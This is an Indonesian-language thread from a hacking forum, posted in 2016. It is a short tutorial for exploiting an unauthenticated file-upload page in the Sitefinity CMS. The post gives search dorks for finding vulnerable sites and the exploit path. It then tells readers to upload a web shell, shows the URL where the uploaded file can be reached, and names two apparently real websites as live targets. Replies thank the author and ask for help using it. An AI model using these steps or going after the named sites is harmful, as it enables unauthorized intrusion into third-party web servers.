BackBox Indonesia
eXploit CMS Sitefinity Editor Dialogs File Upload Vulnerability - Printable Version

+- BackBox Indonesia (https://www.backboxindonesia.or.id)
+-- Forum: Attacking (https://www.backboxindonesia.or.id/forum-12.html)
+--- Forum: Web Attack (https://www.backboxindonesia.or.id/forum-15.html)
+--- Thread: eXploit CMS Sitefinity Editor Dialogs File Upload Vulnerability (/thread-109.html)

eXploit CMS Sitefinity Editor Dialogs File Upload Vulnerability - Nue Bhandell - 04-26-2016

[Image: bug.jpg]
xixixhi siang gengs, sorry kalo tutorial cupu hihi #cumasharekok
*nyari Bug mulu, nyari pacarnya kapan* xD
iseng2 share exploit lama, kali aja masih crotz awkakw.

yg dh master minggir dlu beb  :heart:

Dork : 
inurl:"/Sitefinity/login.aspx"
"UserControls/Dialogs"
"Sitefinity: Login"

Exploit: /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx

Ciri ciri Vuln o.O ?
Muncul form Upload kak  :D

[Image: Ag3acR5.png]

Langsung Upload Shell/file 

Shell/file Akses: http://www.target.co.li/Files/namafilemu

[Image: xdgQ0wN.png]

Live target: 
http://www.borrowmind.com/
http://www.belco.org/

Yuk yang regional Jakarta Join Grup FB:
BackBox Jakarta Team

xixihi kunjungin juga blog ane  :rolleyes: TKJ Cyber Art

semoga bermanfaat Gengs, maap kalo post cupu  [Image: smile.png] 
waktunya Nue dan tim Katakan Putus cabut dulu gengs,   [Image: cool.png] 
Bye~

SUMUR


RE: eXploit CMS Sitefinity Editor Daaialogs File Upload Vulnerability - koboi - 04-26-2016

Mantep nih, perlu di coba (y)
Sering" nge post ya kang..

RE: eXploit CMS Sitefinity Editor Daaialogs File Upload Vulnerability - Nue Bhandell - 04-26-2016

(04-26-2016, 09:06 AM)koboi Wrote: Mantep nih, perlu di coba (y)
Sering" nge post ya kang..

hehehe makasih bang budi :D
maaf ya kalo thread2 yg ane tulis di forum ini garing semua :'D

RE: eXploit CMS Sitefinity Editor Dialogs File Upload Vulnerability - idk_ootb - 07-03-2016

Di Insert ko gamau ya bang ?